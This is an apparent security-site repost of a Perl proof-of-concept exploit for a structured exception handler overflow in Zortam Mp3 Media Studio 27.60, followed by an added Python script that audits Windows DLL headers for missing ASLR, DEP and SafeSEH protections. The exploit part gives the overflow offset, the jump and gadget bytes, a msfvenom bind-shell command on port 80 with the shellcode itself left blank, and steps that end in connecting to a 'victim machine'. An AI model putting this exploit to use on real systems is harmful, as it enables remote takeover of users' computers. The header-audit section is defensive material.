HackDig : Dig high-quality web security articles for hackers

Zortam MP3 Media Studio 27.60 Remote Code Execution

2020-11-21 04:51
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041

# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80

#!/usr/bin/perl

$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272

$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled

# 0x10015962 : pop ecx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
$seh = "\x62\x59\x01\x10"; # seh overwrite

$nop = "\x90" x 12; # NOP sled

# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes
$payload = ""; # payload bytes omitted

$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);

print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";


Source: cxsecurity.com/issue/WLB-2020110162
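The PoC's comments note that the bundled WNASPI32.DLL is loaded with "ASLR: False, Rebase: False, SafeSEH: False". The following is an added example, not part of the original exploit or its author's code, showing how a defender can audit a PE image's headers for those missing opt-ins before shipping or deploying bundled DLLs. The function names (pe_mitigations, findings, sample_pe32) are hypothetical and the sample image is constructed; the SafeSEH check only flags the definite case (no load-configuration directory at all), since an image with that directory may still lack a handler table.

```python
import struct

# DllCharacteristics bits (PE/COFF specification)
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400

def pe_mitigations(data: bytes) -> dict:
    """Read exploit-mitigation opt-ins from a PE image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24            # 4-byte signature + 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional-header magic")
    (chars,) = struct.unpack_from("<H", data, opt + 70)  # same offset in PE32/PE32+
    dirs = opt + (96 if magic == 0x10B else 112)          # start of data directories
    (count,) = struct.unpack_from("<I", data, dirs - 4)  # NumberOfRvaAndSizes
    # Data directory 10 is the load configuration (holds the SafeSEH table on x86).
    lc_rva, lc_size = struct.unpack_from("<II", data, dirs + 80) if count > 10 else (0, 0)
    return {"x86": magic == 0x10B, "aslr": bool(chars & DYNAMIC_BASE),
            "dep": bool(chars & NX_COMPAT), "no_seh": bool(chars & NO_SEH),
            "load_config": bool(lc_rva and lc_size)}

def findings(m: dict) -> list:
    """List the missing opt-ins; SafeSEH only applies to 32-bit images."""
    out = [name for name in ("aslr", "dep") if not m[name]]
    # Without a load-config directory there can be no SafeSEH handler table.
    if m["x86"] and not m["no_seh"] and not m["load_config"]:
        out.append("safeseh")
    return out

def sample_pe32(chars: int, load_config: bool) -> bytes:
    """Constructed header-only PE32 image for the demo (not a real DLL)."""
    img = bytearray(0x40 + 24 + 96 + 16 * 8)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)          # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    opt = 0x40 + 24
    struct.pack_into("<H", img, opt, 0x10B)          # PE32 magic
    struct.pack_into("<H", img, opt + 70, chars)     # DllCharacteristics
    struct.pack_into("<I", img, opt + 92, 16)        # NumberOfRvaAndSizes
    if load_config:
        struct.pack_into("<II", img, opt + 96 + 80, 0x2000, 0x40)
    return bytes(img)

if __name__ == "__main__":
    print(findings(pe_mitigations(sample_pe32(0, False))))
```

To audit a real module, pass the bytes of the file (read in binary mode) to pe_mitigations instead of the constructed sample.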
